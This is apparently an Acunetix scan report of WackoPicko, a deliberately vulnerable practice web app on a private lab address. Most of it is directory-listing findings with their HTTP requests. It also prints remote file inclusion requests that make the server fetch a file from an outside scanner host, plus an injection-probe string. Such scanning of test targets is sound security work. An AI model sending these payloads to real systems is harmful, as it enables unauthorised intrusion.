09 June 2020
Generated by Acunetix
Scan of 192.168.1.124
Scan details
Scan information
Start time 09/06/2020, 04:08:40
Start url http://192.168.1.124/WackoPicko/
Host 192.168.1.124
Scan time 4 minutes, 52 seconds
Profile Full Scan
Server information Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Responsive True
Server OS Unix
Server technologies PHP,Perl,Python,Perl
Threat level
One or more high-severity type vulnerabilities have been discovered by the scanner. A malicious user can exploit these
vulnerabilities and compromise the backend database and/or deface your website.
Alerts distribution
File inclusion
Affected item /WackoPicko/admin/index.php
Affected parameter page
Request
POST /WackoPicko/admin/index.php?page=http://bxss.me/t/fit.txt%3F.jpg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.1.124/WackoPicko/
Connection: keep-alive
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Content-Length: 41
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

adminname=g00dPa%24%24w0rD&password=login
File inclusion
Affected item /WackoPicko/admin/index.php
Affected parameter page
Request
GET /WackoPicko/admin/index.php?page=http://bxss.me/t/fit.txt%3F.jpg HTTP/1.1
Referer: http://192.168.1.124/WackoPicko/
Connection: keep-alive
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
password=g00dPa%24%24w0rD&username=12345'"\'\");|]*%00{%0d%0a<
%00>%bf%27'
Directory listing
Affected item /WackoPicko/cart/
Affected parameter
Request
GET /WackoPicko/cart/ HTTP/1.1
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Directory listing
Affected item /WackoPicko/comments/
Affected parameter
Request
GET /WackoPicko/comments/ HTTP/1.1
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Directory listing
Affected item /WackoPicko/css/
Affected parameter
Request
GET /WackoPicko/css/ HTTP/1.1
Cookie: PHPSESSID=kc180u2rr3thbgefh30k8t06p4
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Directory listing
Affected item /WackoPicko/css/blueprint/
Affected parameter
Request
GET /WackoPicko/css/blueprint/ HTTP/1.1
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Directory listing
Affected item /WackoPicko/css/blueprint/src/
Affected parameter
Request
GET /WackoPicko/css/blueprint/src/ HTTP/1.1
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Directory listing
Affected item /WackoPicko/images/
Affected parameter
Request
GET /WackoPicko/images/ HTTP/1.1
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Directory listing
Affected item /WackoPicko/images/menu/
Affected parameter
Request
GET /WackoPicko/images/menu/ HTTP/1.1
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Directory listing
Affected item /WackoPicko/pictures/
Affected parameter
Request
GET /WackoPicko/pictures/ HTTP/1.1
Cookie: PHPSESSID=kc180u2rr3thbgefh30k8t06p4
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Directory listing
Affected item /WackoPicko/upload/
Affected parameter
Request
GET /WackoPicko/upload/ HTTP/1.1
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Directory listing
Affected item /WackoPicko/upload/3/
Affected parameter
Request
GET /WackoPicko/upload/3/ HTTP/1.1
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Directory listing
Affected item /WackoPicko/upload/LSiFMxMi/
Affected parameter
Request
GET /WackoPicko/upload/LSiFMxMi/ HTTP/1.1
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Directory listing
Affected item /WackoPicko/upload/doggie/
Affected parameter
Request
GET /WackoPicko/upload/doggie/ HTTP/1.1
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Directory listing
Affected item /WackoPicko/upload/flowers/
Affected parameter
Request
GET /WackoPicko/upload/flowers/ HTTP/1.1
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Directory listing
Affected item /WackoPicko/upload/foos/
Affected parameter
Request
GET /WackoPicko/upload/foos/ HTTP/1.1
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Directory listing
Affected item /WackoPicko/upload/house/
Affected parameter
Request
GET /WackoPicko/upload/house/ HTTP/1.1
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Directory listing
Affected item /WackoPicko/upload/quarters/
Affected parameter
Request
GET /WackoPicko/upload/quarters/ HTTP/1.1
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Directory listing
Affected item /WackoPicko/upload/testing/
Affected parameter
Request
GET /WackoPicko/upload/testing/ HTTP/1.1
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Directory listing
Affected item /WackoPicko/upload/toga/
Affected parameter
Request
GET /WackoPicko/upload/toga/ HTTP/1.1
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Directory listing
Affected item /WackoPicko/upload/twister/
Affected parameter
Request
GET /WackoPicko/upload/twister/ HTTP/1.1
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Directory listing
Affected item /WackoPicko/upload/waterfall/
Affected parameter
Request
GET /WackoPicko/upload/waterfall/ HTTP/1.1
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Directory listing
Affected item /WackoPicko/users/
Affected parameter
Request
GET /WackoPicko/users/ HTTP/1.1
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive